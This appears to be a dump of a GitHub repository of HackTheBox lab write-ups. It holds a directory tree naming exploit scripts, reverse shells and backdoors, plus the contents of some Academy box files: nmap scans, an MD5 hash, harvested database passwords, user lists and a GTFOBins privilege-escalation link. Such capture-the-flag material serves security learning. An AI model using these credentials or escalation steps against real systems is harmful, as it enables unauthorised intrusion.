├── Academy
├── README.md
├── files
│ ├── LinEnum.sh
│ ├── hash.txt
│ ├── linpeas.sh
│ ├── nmap
│ │ ├── all.gnmap
│ │ ├── all.nmap
│ │ ├── all.xml
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── passwords.txt
│ └── users.txt
└── images
│ ├── bruteforce.png
│ ├── burp.png
│ ├── env_1.png
│ ├── env_2.png
│ ├── env_3.png
│ ├── env_4.png
│ ├── laravel_env.png
│ ├── laravel_exception.png
│ ├── laravel_exploit.png
│ ├── privesc_1.png
│ ├── privesc_2.png
│ ├── root.png
│ ├── root_1.png
│ ├── root_2.png
│ ├── shell.png
│ ├── sql_1.png
│ ├── sql_2.png
│ ├── sql_3.png
│ ├── sql_4.png
│ ├── sql_5.png
│ ├── sql_6.png
│ ├── user.png
│ ├── user_password.png
│ ├── user_privesc_2.png
│ ├── website_admin_login.png
│ ├── website_admin_panel.png
│ ├── website_main_1.png
│ ├── website_main_2.png
│ ├── website_register.png
│ └── website_user_panel.png
├── Access
├── README.md
├── files
│ ├── Access Control.eml
│ ├── Access Control.pst
│ ├── Access Control.zip
│ ├── backup.mdb
│ ├── minRev.ps1
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ └── notes.txt
└── images
│ ├── auth_user.png
│ ├── cmd.png
│ ├── ftp.png
│ ├── mail.png
│ ├── root.png
│ ├── user.png
│ ├── visual_interface.png
│ └── website.png
├── Active
├── README.md
├── files
│ ├── Groups.xml
│ ├── hash.txt
│ └── notes.txt
└── images
│ ├── root_mnt.png
│ ├── root_pwd.png
│ ├── root_shell.png
│ └── user.png
├── Admirer
├── README.md
├── files
│ ├── LinEnum.sh
│ ├── contacts.txt
│ ├── credentials.txt
│ ├── dump.sql
│ ├── html.tar.gz
│ ├── html
│ │ ├── assets
│ │ │ ├── css
│ │ │ │ ├── fontawesome-all.min.css
│ │ │ │ ├── images
│ │ │ │ │ ├── arrow.svg
│ │ │ │ │ ├── close.svg
│ │ │ │ │ └── spinner.svg
│ │ │ │ ├── main.css
│ │ │ │ └── noscript.css
│ │ │ ├── js
│ │ │ │ ├── breakpoints.min.js
│ │ │ │ ├── browser.min.js
│ │ │ │ ├── jquery.min.js
│ │ │ │ ├── jquery.poptrox.min.js
│ │ │ │ ├── main.js
│ │ │ │ └── util.js
│ │ │ ├── sass
│ │ │ │ ├── base
│ │ │ │ │ ├── _page.scss
│ │ │ │ │ ├── _reset.scss
│ │ │ │ │ └── _typography.scss
│ │ │ │ ├── components
│ │ │ │ │ ├── _actions.scss
│ │ │ │ │ ├── _button.scss
│ │ │ │ │ ├── _form.scss
│ │ │ │ │ ├── _icon.scss
│ │ │ │ │ ├── _icons.scss
│ │ │ │ │ ├── _list.scss
│ │ │ │ │ ├── _panel.scss
│ │ │ │ │ ├── _poptrox-popup.scss
│ │ │ │ │ └── _table.scss
│ │ │ │ ├── layout
│ │ │ │ │ ├── _footer.scss
│ │ │ │ │ ├── _header.scss
│ │ │ │ │ ├── _main.scss
│ │ │ │ │ └── _wrapper.scss
│ │ │ │ ├── libs
│ │ │ │ │ ├── _breakpoints.scss
│ │ │ │ │ ├── _functions.scss
│ │ │ │ │ ├── _mixins.scss
│ │ │ │ │ ├── _vars.scss
│ │ │ │ │ └── _vendor.scss
│ │ │ │ ├── main.scss
│ │ │ │ └── noscript.scss
│ │ │ └── webfonts
│ │ │ │ ├── fa-brands-400.eot
│ │ │ │ ├── fa-brands-400.svg
│ │ │ │ ├── fa-brands-400.ttf
│ │ │ │ ├── fa-brands-400.woff
│ │ │ │ ├── fa-brands-400.woff2
│ │ │ │ ├── fa-regular-400.eot
│ │ │ │ ├── fa-regular-400.svg
│ │ │ │ ├── fa-regular-400.ttf
│ │ │ │ ├── fa-regular-400.woff
│ │ │ │ ├── fa-regular-400.woff2
│ │ │ │ ├── fa-solid-900.eot
│ │ │ │ ├── fa-solid-900.svg
│ │ │ │ ├── fa-solid-900.ttf
│ │ │ │ ├── fa-solid-900.woff
│ │ │ │ └── fa-solid-900.woff2
│ │ ├── images
│ │ │ ├── fulls
│ │ │ │ ├── arch01.jpg
│ │ │ │ ├── arch02.jpg
│ │ │ │ ├── art01.jpg
│ │ │ │ ├── art02.jpg
│ │ │ │ ├── eng01.jpg
│ │ │ │ ├── eng02.jpg
│ │ │ │ ├── mind01.jpg
│ │ │ │ ├── mind02.jpg
│ │ │ │ ├── mus01.jpg
│ │ │ │ ├── mus02.jpg
│ │ │ │ ├── nat01.jpg
│ │ │ │ └── nat02.jpg
│ │ │ └── thumbs
│ │ │ │ ├── thmb_arch01.jpg
│ │ │ │ ├── thmb_arch02.jpg
│ │ │ │ ├── thmb_art01.jpg
│ │ │ │ ├── thmb_art02.jpg
│ │ │ │ ├── thmb_eng01.jpg
│ │ │ │ ├── thmb_eng02.jpg
│ │ │ │ ├── thmb_mind01.jpg
│ │ │ │ ├── thmb_mind02.jpg
│ │ │ │ ├── thmb_mus01.jpg
│ │ │ │ ├── thmb_mus02.jpg
│ │ │ │ ├── thmb_nat01.jpg
│ │ │ │ └── thmb_nat02.jpg
│ │ ├── index.php
│ │ ├── robots.txt
│ │ ├── utility-scripts
│ │ │ ├── admin_tasks.php
│ │ │ ├── db_admin.php
│ │ │ ├── info.php
│ │ │ └── phptest.php
│ │ └── w4ld0s_s3cr3t_d1r
│ │ │ ├── contacts.txt
│ │ │ └── credentials.txt
│ ├── nmap
│ │ ├── all.gnmap
│ │ ├── all.nmap
│ │ ├── all.xml
│ │ ├── all_again.gnmap
│ │ ├── all_again.nmap
│ │ ├── all_again.xml
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ └── words.txt
└── images
│ ├── adminer.png
│ ├── adminer0.png
│ ├── adminer05.png
│ ├── adminer1.png
│ ├── adminer15.png
│ ├── adminer2.png
│ ├── adminer4.png
│ ├── adminer5.png
│ ├── adminer6.png
│ ├── adminer7.png
│ ├── adminer8.png
│ ├── adminer9.png
│ ├── brute2.png
│ ├── db-credentials.png
│ ├── ftp.png
│ ├── new-credentials.png
│ ├── new-data.png
│ ├── phpinfo.png
│ ├── robots.png
│ ├── root.png
│ ├── ssh.png
│ ├── sudo-enum.png
│ └── website.png
├── Bashed
├── README.md
└── images
│ ├── End.png
│ ├── ls_as_scriptmanager.png
│ ├── root.png
│ ├── scripts.png
│ ├── sudo-l.png
│ ├── webpage.png
│ └── webshell.png
├── Blunder
├── README.md
├── files
│ ├── 1.txt
│ ├── LinEnum.sh
│ ├── Pictures
│ │ ├── 1.b64
│ │ ├── 1.png
│ │ ├── 2.b64
│ │ └── 2.png
│ ├── buzz.wav
│ ├── ftp
│ │ ├── config.json
│ │ └── note.txt
│ ├── hash.txt
│ ├── nmap
│ │ ├── all.gnmap
│ │ ├── all.nmap
│ │ ├── all.xml
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ └── todo.txt
└── images
│ ├── blundit1.png
│ ├── blundit2.png
│ ├── dirlist.png
│ ├── exploit.png
│ ├── fergus.png
│ ├── ftp.png
│ ├── github.png
│ ├── hash.png
│ ├── installations.png
│ ├── password.png
│ ├── root.png
│ ├── searchsploit.png
│ ├── source.png
│ ├── stego.png
│ ├── sudo.png
│ ├── user.png
│ └── website.png
├── Bucket
├── README.md
├── files
│ └── notes.txt
└── images
│ ├── afterthoughts1.png
│ ├── afterthoughts2.png
│ ├── console1.png
│ ├── console2.png
│ ├── console3.png
│ ├── console4.png
│ ├── ec2.png
│ ├── initial1.png
│ ├── initial2.png
│ ├── initial3.png
│ ├── initial4.png
│ ├── initial5.png
│ ├── initial6.png
│ ├── initial7.png
│ ├── initial8.png
│ ├── privesc1.png
│ ├── privesc10.png
│ ├── privesc11.png
│ ├── privesc12.png
│ ├── privesc13.png
│ ├── privesc14.png
│ ├── privesc15.png
│ ├── privesc2.png
│ ├── privesc3.png
│ ├── privesc4.png
│ ├── privesc5.png
│ ├── privesc6.png
│ ├── privesc7.png
│ ├── privesc8.png
│ ├── privesc9.png
│ ├── user1.png
│ ├── user2.png
│ ├── user3.png
│ ├── user4.png
│ ├── user5.png
│ ├── user_creds1.png
│ ├── user_creds2.png
│ └── user_creds3.png
├── Cache
├── README.md
├── files
│ ├── files
│ │ ├── ci
│ │ │ └── ci.sh
│ │ ├── config
│ │ │ ├── config.yaml
│ │ │ └── services.yml
│ │ └── sql
│ │ │ └── database.sql
│ ├── hash.txt
│ ├── nmap
│ │ ├── all.gnmap
│ │ ├── all.nmap
│ │ ├── all.xml
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── pspy32
│ ├── wfuzz.txt
│ └── wordlist.txt
└── images
│ ├── ash.png
│ ├── author.png
│ ├── credentials1.png
│ ├── dirsearch1.png
│ ├── dirsearch2.png
│ ├── docker1.png
│ ├── hash.png
│ ├── hms.png
│ ├── hms1.png
│ ├── hms2.png
│ ├── hms3.png
│ ├── login.png
│ ├── net.png
│ ├── rce.png
│ ├── report.png
│ ├── root.png
│ ├── source.png
│ ├── sql1.png
│ ├── sql2.png
│ ├── sql3.png
│ ├── sql4.png
│ ├── sql5.png
│ ├── sql6.png
│ ├── sql7.png
│ ├── unauth.png
│ ├── unauth2.png
│ └── website.png
├── Canape
├── README.md
├── canape.rtf
├── images
│ ├── checkout.png
│ ├── dump.png
│ ├── etc_passwd.png
│ ├── exp2.0.png
│ ├── packets.png
│ ├── page1.png
│ ├── page2.png
│ ├── page3.png
│ ├── page4.png
│ ├── recon.png
│ ├── rev_shell.png
│ ├── root1.png
│ ├── root2.png
│ ├── root_dir.png
│ └── simple_server_data.png
├── nmap
│ ├── initial.gnmap
│ ├── initial.nmap
│ └── initial.xml
├── notes.txt
└── python
│ ├── etc_passwd.py
│ ├── ex.py
│ ├── ping_works.py
│ ├── post-server.py
│ └── shell.py
├── Celestial
├── README.md
├── cow.c
├── images
│ ├── 1.png
│ ├── 2.png
│ ├── 3.png
│ ├── 4.png
│ ├── 5.png
│ ├── 6.png
│ ├── Error.png
│ └── nmap.png
├── nodejsshell.py
└── nodeserialize.js
├── Chaos
├── README.md
├── files
│ ├── DirBusterReport-chaos-80.txt
│ ├── Linenum.sh
│ ├── decrypt.py
│ ├── encode.py
│ ├── imap.txt
│ ├── key4.db
│ ├── linenum.txt
│ ├── logins.json
│ ├── msg.txt
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ ├── initial.xml
│ │ ├── udp.gnmap
│ │ ├── udp.nmap
│ │ └── udp.xml
│ ├── notes.txt
│ ├── out.txt
│ ├── rev.php
│ └── rev_shell.sh
└── images
│ ├── ayush.png
│ ├── decrypted_message.png
│ ├── firefox.png
│ ├── pdf.png
│ ├── rce-test1.png
│ ├── rce-test2.png
│ ├── rev-shell.png
│ ├── web1.png
│ ├── web2.png
│ ├── web3.png
│ ├── web4.png
│ └── web5.png
├── Craft
├── README.md
├── files
│ ├── commands.sh
│ ├── key
│ ├── nmap
│ │ └── initial
│ ├── notes.txt
│ ├── settings.py
│ └── sql.py
└── images
│ ├── domains.png
│ ├── gogs1.png
│ ├── gogs2.png
│ ├── gogs3.png
│ ├── gogs4.png
│ ├── gogs5.png
│ ├── gogs6.png
│ ├── gogs7.png
│ ├── private1.png
│ ├── private2.png
│ ├── private3.png
│ ├── reverse.png
│ ├── root1.png
│ ├── root2.png
│ ├── settings.png
│ ├── sql.png
│ ├── swagger.png
│ ├── token.png
│ ├── user.png
│ └── webpage.png
├── Curling
├── README.md
├── files
│ ├── Joomla-Shell-Upload.py
│ ├── backup.bz2
│ ├── backup_hex
│ ├── data_hex
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── password.txt
│ └── sudoers
└── images
│ ├── admin-area.png
│ ├── admin_login.png
│ ├── admin_panel.png
│ ├── cronjob.png
│ ├── curl.png
│ ├── curl_pass.png
│ ├── main.png
│ ├── pwd_decompress.png
│ ├── rce.png
│ ├── root_hash.png
│ ├── root_user.png
│ ├── user_hash.png
│ └── username.png
├── DevOps
├── README.md
├── devsolita-snapshot.png
├── dirb.txt
├── images
│ ├── feed.png
│ ├── git-diff.png
│ ├── git-log.png
│ ├── initial.png
│ ├── output.png
│ ├── passwd.png
│ ├── root.png
│ ├── upload.png
│ └── user.png
├── index.html
├── nmap
│ ├── initial.gnmap
│ ├── initial.nmap
│ └── initial.xml
├── roosa.key
├── root.key
├── test.xml
└── test2.xml
├── FriendZone
├── README.md
├── files
│ ├── LinEnum.sh
│ ├── friendzone-general_creds.txt
│ ├── hosts-file.txt
│ ├── nikto.txt
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── out.txt
│ ├── pspy64s
│ ├── reporter.py
│ ├── shell.php
│ ├── test.php
│ └── zone-transfer.txt
└── images
│ ├── dig.png
│ ├── logo.png
│ ├── pspy.png
│ ├── rev.png
│ ├── root_dir.png
│ ├── smb1.png
│ ├── smb2.png
│ ├── test.png
│ ├── web445_1.png
│ ├── web445_2.png
│ ├── web445_3.png
│ ├── web445_4.png
│ └── web80.png
├── Fuse
├── README.md
└── images
│ ├── doc1.png
│ ├── doc2.png
│ ├── doc3.png
│ ├── files.png
│ ├── hint.png
│ ├── ntlm.png
│ ├── redirect.png
│ ├── root1.png
│ ├── root2.png
│ ├── rpc.png
│ ├── smb1.png
│ ├── smb2.png
│ ├── smb3.png
│ ├── smb4.png
│ ├── smb5.png
│ ├── user1.png
│ ├── user2.png
│ ├── website.png
│ ├── winrm1.png
│ └── winrm2.png
├── Haystack
├── README.md
├── files
│ ├── 9200.json
│ ├── needle.jpg
│ ├── nmap
│ │ └── initial
│ └── notes.txt
└── images
│ ├── exploit.png
│ ├── filter_conf.png
│ ├── indices.png
│ ├── input_conf.png
│ ├── json.png
│ ├── kibana1.png
│ ├── kibana2.png
│ ├── kibana_shell.png
│ ├── local.png
│ ├── logstash_recon.png
│ ├── needle.png
│ ├── output_conf.png
│ ├── pycode.png
│ ├── quotes.png
│ ├── root.png
│ ├── strings.png
│ └── user.png
├── Heist
├── README.md
├── files
│ ├── config.txt
│ ├── nmap
│ │ ├── all
│ │ ├── initial
│ │ └── udp
│ └── notes.txt
└── images
│ ├── chat.png
│ ├── evilwinrm.png
│ ├── hash1.png
│ ├── hash2.png
│ ├── login.png
│ ├── lookupsid.png
│ ├── process1.png
│ ├── process2.png
│ ├── root-pass.png
│ ├── root.png
│ ├── smb1.png
│ └── user.png
├── Help
├── README.md
├── files
│ ├── 44298.c
│ ├── DirBuster-Report-2019-02-06-help.txt
│ ├── LinEnum.sh
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── out.txt
│ ├── rev.php
│ ├── rev_shell.php
│ └── test.py
└── images
│ ├── apache.png
│ ├── file_blocked.png
│ ├── github1.png
│ ├── github2.png
│ ├── hd1.png
│ ├── hd2.png
│ ├── hd3.png
│ ├── image_upload.png
│ ├── listener_user_hash.png
│ ├── root.png
│ ├── searchsploit.png
│ └── shell.png
├── Jarvis
├── README.md
├── files
│ ├── DirBusterReport.txt
│ ├── a
│ ├── a.pub
│ ├── nmap
│ │ └── initial
│ ├── pepper.key
│ ├── phpmyadmin_lfi_rce.rb
│ ├── s.service
│ └── simpler.py
└── images
│ ├── failed1.png
│ ├── info1.png
│ ├── info2.png
│ ├── metasploit.png
│ ├── param.png
│ ├── phpmyadmin.png
│ ├── shell.png
│ ├── sqlmap.png
│ ├── sqlmap_out.png
│ ├── ssh.png
│ ├── steps.png
│ ├── success1.png
│ ├── success2.png
│ ├── sudol.png
│ ├── suids.png
│ └── website.png
├── Jerry
├── README.md
├── images
│ ├── control.png
│ ├── fresh.png
│ ├── hashes.png
│ ├── shell.png
│ └── war.png
├── lmfuyxnlrwrnfg.jsp
└── nmap
│ ├── initial.gnmap
│ ├── initial.nmap
│ └── initial.xml
├── Luke
├── README.md
└── images
│ ├── ajenti.png
│ ├── filemanager.png
│ ├── ftp.png
│ ├── home.png
│ ├── json.png
│ ├── management.png
│ ├── notepad.png
│ ├── root.png
│ ├── terminal.png
│ └── web.png
├── Magic
├── README.md
├── files
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── read.php
│ ├── revshell.php.jpg
│ └── shell.php.jpeg
└── images
│ ├── db.png
│ ├── extension_check.png
│ ├── initial.png
│ ├── login.png
│ ├── magic_check.png
│ ├── pspy.png
│ ├── rce.png
│ ├── reverse_shell.png
│ ├── root.png
│ ├── sql1.png
│ ├── sql2.png
│ ├── strings.png
│ ├── suid.png
│ ├── upload.png
│ ├── upload_success.png
│ ├── uploads_directory.png
│ └── user.png
├── Networked
├── README.md
└── images
│ ├── apache-shell.png
│ ├── backup.png
│ ├── changename.png
│ ├── check-attack.png
│ ├── extracted.png
│ ├── fuzzing.png
│ ├── guly.png
│ ├── initial.png
│ ├── listing-files.png
│ ├── photos1.png
│ ├── photos2.png
│ ├── phpinfo.png
│ ├── root.png
│ ├── sudo_l.png
│ └── test_root.png
├── Nibbles
├── README.md
├── files
│ ├── DirBusterReport-10.10.10.75-80-simple.txt
│ ├── DirBusterReport-10.10.10.75-80.txt
│ └── linenum_output.txt
├── images
│ ├── burp.png
│ ├── initial.png
│ ├── login.png
│ ├── msp.png
│ ├── nb.png
│ ├── pers1.png
│ ├── pers2.png
│ ├── php.png
│ ├── root.png
│ └── sudol.png
└── nmap
│ ├── initial.gnmap
│ ├── initial.nmap
│ └── initial.xml
├── Passage
├── README.md
├── files
│ ├── 41356.zip
│ ├── CVE-2019-11447.py
│ ├── LinEnum.sh
│ ├── h.txt
│ ├── hashes.txt
│ ├── linux-exploit-suggester.sh
│ ├── nadav.key
│ ├── nmap
│ │ ├── all.gnmap
│ │ ├── all.nmap
│ │ ├── all.xml
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── paul.key
│ └── root.key
└── images
│ ├── cutenews1.png
│ ├── cutenews2.png
│ ├── cutenews3.png
│ ├── foothold1.png
│ ├── foothold2.png
│ ├── foothold3.png
│ ├── foothold4.png
│ ├── nadav1.png
│ ├── nadav2.png
│ ├── nadav3.png
│ ├── nadav4.png
│ ├── nadav5.png
│ ├── nadav6.png
│ ├── nadav7.png
│ ├── paul1.png
│ ├── root1.png
│ ├── website1.png
│ ├── website2.png
│ ├── website3.png
│ ├── website4.png
│ └── website5.png
├── Poison
├── README.md
├── files
│ ├── etc_passwd.txt
│ ├── notes.txt
│ ├── privesccheck.txt
│ ├── privesccheck_prim.txt
│ ├── privescheck.txt
│ ├── pwdbackup.html
│ ├── secret
│ └── secret.zip
├── images
│ ├── etc_passwd.png
│ ├── pwd.png
│ ├── pwdbackup.png
│ ├── root.png
│ ├── service_-e.png
│ ├── sources.png
│ ├── user.png
│ ├── vnc.png
│ ├── vnc_psaux.png
│ └── web.png
└── nmap
│ ├── initial.gnmap
│ ├── initial.nmap
│ └── initial.xml
├── README.md
├── Safe
├── README.md
└── images
│ ├── checksec.png
│ ├── enum1.png
│ ├── enum2.png
│ ├── file.png
│ ├── gdb.png
│ ├── ghidra.png
│ ├── leet.png
│ ├── lib.png
│ ├── memory.png
│ ├── password.png
│ ├── root.png
│ ├── rop.png
│ ├── source.png
│ └── user.png
├── Secnotes
├── README.md
├── files
│ ├── Invoke-PowerShellTcp.ps1
│ ├── ipconfig.txt
│ ├── notes.html
│ └── shell.php
├── images
│ ├── bash_works.png
│ ├── home.png
│ ├── iis.png
│ ├── linux1.png
│ ├── login.png
│ ├── new-site.png
│ ├── note.png
│ ├── root.png
│ ├── root2.png
│ ├── sign_up.png
│ ├── smb.png
│ ├── sql.png
│ ├── test1.png
│ ├── test2.png
│ ├── tyler.png
│ └── xss.png
├── nmap
│ ├── initial.gnmap
│ ├── initial.nmap
│ ├── initial.xml
│ ├── second.gnmap
│ ├── second.nmap
│ └── second.xml
├── notes.txt
└── user.txt
├── Sense
├── README.md
├── images
│ ├── .DS_Store
│ ├── file.png
│ ├── nmap.png
│ ├── pfsense.png
│ ├── rce-exploit.png
│ ├── root-hash.png
│ └── user-hash.png
└── pfsense_graph_injection_exec.rb
├── SneakyMailer
├── README.md
├── files
│ ├── contents.txt
│ ├── emails.txt
│ ├── hash.txt
│ ├── malicious_package
│ │ ├── .local
│ │ │ └── share
│ │ │ │ └── nvim
│ │ │ │ └── shada
│ │ │ │ └── main.shada
│ │ ├── .pypirc
│ │ ├── dist
│ │ │ ├── root2u-0.0.1.tar.gz
│ │ │ └── test-0.0.1.tar.gz
│ │ ├── root2u.egg-info
│ │ │ ├── PKG-INFO
│ │ │ ├── SOURCES.txt
│ │ │ ├── dependency_links.txt
│ │ │ └── top_level.txt
│ │ ├── setup.py
│ │ └── test.egg-info
│ │ │ ├── PKG-INFO
│ │ │ ├── SOURCES.txt
│ │ │ ├── dependency_links.txt
│ │ │ └── top_level.txt
│ ├── nmap
│ │ ├── all.gnmap
│ │ ├── all.nmap
│ │ ├── all.xml
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── request.txt
│ ├── scripts
│ │ ├── developer
│ │ │ └── clean-ftp.py
│ │ ├── low
│ │ │ └── install-modules.py
│ │ └── vmail
│ │ │ ├── imap-user-login.py
│ │ │ └── restore-sent-mail-box.py
│ ├── sendmail.sh
│ ├── test.html
│ ├── test.php
│ └── users.txt
└── images
│ ├── dashboard.png
│ ├── dev1.png
│ ├── dev2.png
│ ├── email1.png
│ ├── email2.png
│ ├── email3.png
│ ├── email4.png
│ ├── email5.png
│ ├── email6.png
│ ├── emails.png
│ ├── ftp1.png
│ ├── ftp2.png
│ ├── ftp3.png
│ ├── htpasswd.png
│ ├── john.png
│ ├── nginx.png
│ ├── pypi1.png
│ ├── pypi2.png
│ ├── pypi3.png
│ ├── pypi4.png
│ ├── pypi5.png
│ ├── root.png
│ ├── scripts.png
│ └── vhosts.png
├── Stratosphere
├── README.md
├── dirb
│ └── result.txt
├── images
│ ├── 1check.png
│ ├── dirbuster.png
│ ├── iptables.png
│ ├── john.png
│ ├── monitoring.png
│ ├── py_vuln.png
│ ├── python_vuln.png
│ ├── root_shell.png
│ └── ssh.png
├── linenum
│ ├── Linenum-result.txt
│ └── Linenum.sh
├── mysql
│ ├── mysqldump-discover.txt
│ └── mysqldump.txt
├── nmap
│ ├── first.gnmap
│ ├── first.nmap
│ ├── first.xml
│ └── second
├── notes.txt
├── rxp.py
└── test.py
├── Sunday
├── README.md
├── files
│ ├── data.txt
│ ├── john_pwd.txt
│ ├── john_pwd_root.txt
│ ├── passwd
│ ├── root_shadow
│ ├── shadow
│ └── shadow.backup
├── images
│ ├── backup.png
│ ├── sammy_pwd.png
│ ├── sunny.png
│ ├── sunny_not.png
│ ├── troll.png
│ ├── user.png
│ ├── wget-sudo.png
│ └── wget_output.png
├── nmap
│ ├── fourth.gnmap
│ ├── fourth.nmap
│ ├── fourth.xml
│ ├── initial.gnmap
│ ├── initial.nmap
│ ├── initial.xml
│ ├── second.gnmap
│ ├── second.nmap
│ ├── second.xml
│ ├── third.gnmap
│ ├── third.nmap
│ └── third.xml
└── www
│ ├── pspy64
│ └── pspy64s
├── SwagShop
├── README.md
├── files
│ ├── 37977.py
│ ├── backdoor
│ │ ├── bd.tgz
│ │ ├── errors2
│ │ │ └── backdoor.php
│ │ ├── package.tar.gz
│ │ └── package.xml
│ ├── files
│ │ ├── exploit.py
│ │ ├── hs_err_pid8307.log
│ │ ├── local.xml
│ │ ├── magento-sqli.py
│ │ └── notes.txt
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ └── notes.txt
└── images
│ ├── control.png
│ ├── downloader.png
│ ├── exp1.png
│ ├── failed.png
│ ├── searchsploit.png
│ ├── shell1.png
│ ├── shell2.png
│ ├── shell3.png
│ ├── shell4.png
│ ├── shell5.png
│ └── website.png
├── Valentine
├── README.md
├── files
│ ├── Dirbuster.txt
│ ├── hype_key.txt
│ ├── nmap
│ │ ├── initial.gnmap
│ │ ├── initial.nmap
│ │ └── initial.xml
│ ├── notes.txt
│ ├── rsa.txt
│ └── rsa_dec.txt
├── images
│ ├── image_init.png
│ ├── key.png
│ ├── meta1.png
│ ├── meta2.png
│ ├── omg.jpg
│ ├── ssh.png
│ ├── ssltest.png
│ └── tmux.png
└── ssltest.py
└── Writeup
├── README.md
├── files
├── 46635.py
├── LinEnum.sh
├── nmap
│ └── initial
└── notes.txt
└── images
├── hash.png
├── main.png
├── modules.png
├── pspy.png
├── root1.png
├── root2.png
├── run-parts.png
├── shell.png
├── source.png
├── whoami.png
├── writeup1.png
└── writeup2.png
/Academy/files/hash.txt:
--------------------------------------------------------------------------------
1 | a317f096a83915a3946fae7b7f035246
2 |
--------------------------------------------------------------------------------
/Academy/files/nmap/all.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sat Dec 12 19:29:02 2020 as: nmap -sV -sC -p- -oA nmap/all academy.htb
2 | Host: 10.10.10.215 (academy.htb) Status: Up
3 | Host: 10.10.10.215 (academy.htb) Ports: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, 33060/open/tcp//mysqlx?/// Ignored State: closed (65532)
4 | # Nmap done at Sat Dec 12 19:30:18 2020 -- 1 IP address (1 host up) scanned in 76.39 seconds
5 |
--------------------------------------------------------------------------------
/Academy/files/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sat Dec 12 19:26:28 2020 as: nmap -sV -sC -oA nmap/initial academy.htb
2 | Host: 10.10.10.215 (academy.htb) Status: Up
3 | Host: 10.10.10.215 (academy.htb) Ports: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/ Ignored State: closed (998)
4 | # Nmap done at Sat Dec 12 19:26:37 2020 -- 1 IP address (1 host up) scanned in 8.28 seconds
5 |
--------------------------------------------------------------------------------
/Academy/files/notes.txt:
--------------------------------------------------------------------------------
1 | DB_CONNECTION=mysql
2 | DB_HOST=127.0.0.1
3 | DB_PORT=3306
4 | DB_DATABASE=academy
5 | DB_USERNAME=dev
6 | DB_PASSWORD=mySup3rP4s5w0rd!!
7 |
8 |
9 | root:GkEWXn4h34g8qx9fZ1 for db from config.php
10 |
11 | https://gtfobins.github.io/gtfobins/composer/
12 |
--------------------------------------------------------------------------------
/Academy/files/passwords.txt:
--------------------------------------------------------------------------------
1 | GkEWXn4h34g8qx9fZ1
2 | mySup3rP4s5w0rd!!
3 | SecREt01
4 | test1234
5 | mrb3n_Ac@d3my!
6 |
--------------------------------------------------------------------------------
/Academy/files/users.txt:
--------------------------------------------------------------------------------
1 | root
2 | 21y4d
3 | ch4p
4 | cry0l1t3
5 | egre55
6 | g0blin
7 | mrb3n
8 |
--------------------------------------------------------------------------------
/Academy/images/bruteforce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/bruteforce.png
--------------------------------------------------------------------------------
/Academy/images/burp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/burp.png
--------------------------------------------------------------------------------
/Academy/images/env_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/env_1.png
--------------------------------------------------------------------------------
/Academy/images/env_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/env_2.png
--------------------------------------------------------------------------------
/Academy/images/env_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/env_3.png
--------------------------------------------------------------------------------
/Academy/images/env_4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/env_4.png
--------------------------------------------------------------------------------
/Academy/images/laravel_env.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/laravel_env.png
--------------------------------------------------------------------------------
/Academy/images/laravel_exception.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/laravel_exception.png
--------------------------------------------------------------------------------
/Academy/images/laravel_exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/laravel_exploit.png
--------------------------------------------------------------------------------
/Academy/images/privesc_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/privesc_1.png
--------------------------------------------------------------------------------
